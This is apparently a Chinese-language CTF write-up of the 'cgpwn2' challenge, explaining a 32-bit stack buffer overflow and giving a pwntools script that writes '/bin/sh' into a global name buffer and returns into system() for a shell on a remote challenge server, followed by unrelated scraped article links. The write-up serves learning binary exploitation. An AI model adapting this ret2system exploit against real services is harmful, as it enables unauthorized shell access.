file,checksec:

main 函数:

hello 函数:



name 中可以保存字符串,因此我们在 name 中输入 /bin/sh,那么我们就可以利用变量 name 的内存地址,得到 system('/bin/sh'),从而得到shell。

pwn 函数(存在system):

溢出大小为:0x26+4

我本来在ROPgadget中找到了 sh 字符串,但是一直无法成功得到shell,之后查看才得知,这个sh并不是单纯的 sh。草率了。但是不知道为什么 ciscn_2019_ne_5 可以跑通。求师傅指教。





payload加入main函数,原因:32位和64位的结构不同,32位调用一个函数需要返回地址,之后再调用其他的进行传参,而且32位是用栈传递参数的,而64为使用比如rdi,rsi等寄存器进行传参,因此需要插入一个 main 函数作为返回地址。

利用exp:

from pwn import *

#start

r = remote('61.147.171.35',63069)

context.log_level = 'debug'

elf = ELF('./pwn')

#params

#system_addr = 0x8048420

system_addr = elf.sym['system']

main_addr = elf.sym['main']

name_addr = elf.sym['name']

#attack

payload = b'a'*(0x26+4) + p32(system_addr) + p32(main_addr) + p32(name_addr)

r.sendlineafter(b'name',b'/bin/sh')

r.sendline(payload)

r.interactive()

PWN手的成长之路-20-cgpwn2的更多相关文章

  1. 物联网架构成长之路(20)-申请免费SSL证书

    0.前言 今天域名备案申请下来了,接下来就是申请个SSL证书,现在普通的网站没有SSL都不好意思见人了.可是稍微好点的企业级SSL证书还是比较贵的.不过还好有免费的可以用.只不过要定时去续时间.这个不 ...

  2. 《菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师》

    <菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师> 国庆节快乐!一年一度长度排第二的假期终于来了. 难得有十一长假,作者也想要休息几天啦. 不管你是选择出门玩,还是在公司加班,在学 ...

  3. 原创电子书《菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师》

    <菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师> 国庆节快乐!一年一度长度排第二的假期终于来了. 难得有十一长假,作者也想要休息几天啦. 不管你是选择出门玩,还是在公司加班,在学 ...

  4. (转)Python成长之路【第九篇】:Python基础之面向对象

    一.三大编程范式 正本清源一:有人说,函数式编程就是用函数编程-->错误1 编程范式即编程的方法论,标识一种编程风格 大家学习了基本的Python语法后,大家就可以写Python代码了,然后每个 ...

  5. 专访雷水果国:离1.5K至18K 一个程序猿5每年的成长之路

    我只是一个小菜鸟,对于自主学习和交流PHP(jquery,linux,lamp,shell,javascript,server)等一系列的知识.小菜鸟创建了一个群.希望光临本博客的人能够进来交流. 寻 ...

  6. OpenCV成长之路:图像直方图的应用

    OpenCV成长之路:图像直方图的应用 2014-04-11 13:57:03 标签:opencv 图像 直方图 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 .作者信息和本声明.否 ...

  7. OpenCV成长之路:图像滤波

    http://ronny.blog.51cto.com/8801997/1394138 OpenCV成长之路:图像滤波 2014-04-11 14:28:44 标签:opencv 边缘检测 sobel ...

  8. OpenCV成长之路:直线、轮廓的提取与描述

    http://ronny.blog.51cto.com/8801997/1394139 OpenCV成长之路:直线.轮廓的提取与描述 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 . ...

  9. python工程师成长之路精品课程(全套)

    python工程师成长之路精品课程(全套)  有需要联系我:QQ:1844912514 什么是Python? Python是一门面向对象的编程语言,它相对于其他语言,更加易学.易读,非常适合快速开发. ...

  10. 阿里技术分享:阿里自研金融级数据库OceanBase的艰辛成长之路

    本文原始内容由作者“阳振坤”整理发布于OceanBase技术公众号. 1.引言 OceanBase 是蚂蚁金服自研的分布式数据库,在其 9 年的发展历程里,从艰难上线到找不到业务场景濒临解散,最后在双 ...

随机推荐

  1. ps正版弹窗问题解决

  2. 万人同屏 角色动画优化 Animation Instancing动画实例化– SkinnedMeshRenderer的实例化 GPU Instancing

    在上一篇文章中有个技术点引发了我的好奇 GPU Instancing 这个技术是Unity自带的功能,但是他不支持SkinnedMeshRenderer,所以要采用特殊方法 他这里采用GPU蒙皮+EC ...

  3. 「闲聊文」准大三的我,思前想后还是不搞java了

    直接拿我在我们学校贴吧发的文了,我只是个二本生,进互联网还是很难的啦,还是转行吧. 有人说 "不要美化自己未走过的道路",毕竟已经沉默成本在这里面了,我也有点拎不清,但是也是决定了 ...

  4. 读《我加载了恋爱游戏》(by掠过的乌鸦)

    读书经过 事情发生于寒假请假在家的一个下午,闲来无事刷b站,看到up主凌凌上将带老爸看小说女主的视频(因为<我真没想重生啊>点进去的),出现清野凛.然后由于推送机制加上之前也被推过,我就看 ...

  5. OpenLDAP 客户端核心命令操作详解

    以下是OpenLDAP客户端核心命令的操作详解,涵盖常用命令.参数解析及实际应用场景,结合技术要点与最佳实践整理而成: ​​一.基础连接与认证​​ ​​服务器连接参数​​ -H/-h:指定LDAP服务 ...

  6. JavaSE-方法在其他类中的调用

    方法在其它类的调用 在Java中,如果你在一个类中定义了一个方法,并想在另一个与之相关的类中调用这个方法,你有几种不同的选项,具体取决于这两个类的关系以及方法的性质(是否为静态方法).以下是一些基本的 ...

  7. 通过Certbot自动申请更新HTTPS网站的SSL证书

    原文地址:通过Certbot自动申请更新HTTPS网站的SSL证书 现在很多云服务运营商免费的HTTPS证书有效期只有3个月,对于个人网站来说,这就很麻烦,现在可以用 Certbot + Cronta ...

  8. MyEMS开源能源管理系统核心代码解读006

    **本期解读: ** 虚拟表计算方法:myems/myems-normalization/virtualmeter.py 源代码请点击https://gitee.com/myems/myems/blo ...

  9. [题解]SFMOI Round I A~C

    Portal:https://www.luogu.com.cn/contest/179008 \(\bf{100+50+50+25+5=\color{indianred}225}\)\(\bf{\ , ...

  10. 学习python步骤

    参考链接:https://zhuanlan.zhihu.com/p/693208513 一.Python基础 学习Python语言基础的路线可以分为以下几个阶段: Python3入门: 了解Pytho ...